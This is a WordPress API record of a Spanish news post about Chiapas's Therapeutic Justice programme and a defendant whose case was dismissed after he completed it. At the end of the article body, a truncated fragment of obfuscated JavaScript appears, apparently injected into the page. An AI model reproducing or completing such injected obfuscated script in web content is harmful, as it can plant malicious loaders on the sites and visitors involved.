{"id":23502,"date":"2025-08-16T02:52:38","date_gmt":"2025-08-16T02:52:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23502"},"modified":"2025-08-16T02:52:39","modified_gmt":"2025-08-16T02:52:39","slug":"con-justicia-terapeutica-se-fortalece-el-enfoque-humanista-de-la-justicia-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23502","title":{"rendered":"Con Justicia Terap\u00e9utica, se fortalece el enfoque humanista de la justicia en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000280389-1024x682.jpg\" alt=\"\" class=\"wp-image-23503\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000280389-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000280389-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000280389-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000280389-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000280389-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000280389.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>-Se impulsa la reinserci\u00f3n social y se atienden las causas del delito mediante un programa integral y multidisciplinario.<\/p>\n\n\n\n<p>15 de agosto del 2025. El Poder Judicial del Estado de Chiapas impulsa programas y mecanismos que promueven la b\u00fasqueda de soluciones que atiendan las causas subyacentes de los problemas legales, no solo sus consecuencias, lo que permite fortalecer el bienestar, la recuperaci\u00f3n y la prevenci\u00f3n, como es el Programa de Justicia Terap\u00e9utica.<\/p>\n\n\n\n<p>En este tenor, con la visi\u00f3n humanista que ha implementado el magistrado Juan Carlos Moreno Guill\u00e9n, un equipo multidisciplinario encabezado por una jueza especializada en Justicia Terap\u00e9utica, inform\u00f3 recientemente uno de los casos de \u00e9xito, en el que una persona de sexo masculino, de nombre Samuel \u201cN\u201d, fue beneficiada con este programa.<\/p>\n\n\n\n<p>Tras ser vinculado a proceso por el delito contra la salud, ocurrido en el distrito judicial de San Crist\u00f3bal, Samuel \u201cN\u201d, de manera voluntaria y con el asesoramiento de una defensa especializada en la materia, solicit\u00f3 que el Juzgado Especializado en Justicia Terap\u00e9utica tuviera conocimiento de su expediente.<\/p>\n\n\n\n<p>Gracias al acompa\u00f1amiento constante del equipo multidisciplinario, integrado por la Secretar\u00eda de Salud, la Secretar\u00eda de Seguridad del Pueblo, la Fiscal\u00eda General del Estado, y como coordinador el Poder Judicial del Estado, Samuel \u201cN\u201d logr\u00f3 con \u00e9xito graduarse y egresar del citado programa, por lo que se declar\u00f3 la extinci\u00f3n de la acci\u00f3n penal y, por ende, el sobreseimiento del proceso penal con los efectos de una sentencia absolutoria.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial evidencia la importancia de programas y modelos con enfoque humanista, con los que se contribuye a la construcci\u00f3n de una sociedad m\u00e1s solidaria, accesible, incluyente, y con mayores oportunidades de reinserci\u00f3n social.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-Se impulsa la reinserci\u00f3n social y se atienden las causas del delito mediante un programa integral y multidisciplinario. 15 de agosto del 2025. El Poder Judicial del Estado de Chiapas impulsa programas y mecanismos que promueven la b\u00fasqueda de soluciones que atiendan las causas subyacentes de los problemas legales, no solo sus consecuencias, lo que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23503,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23502","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23502","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23502"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23502\/revisions"}],"predecessor-version":[{"id":23504,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23502\/revisions\/23504"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23503"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}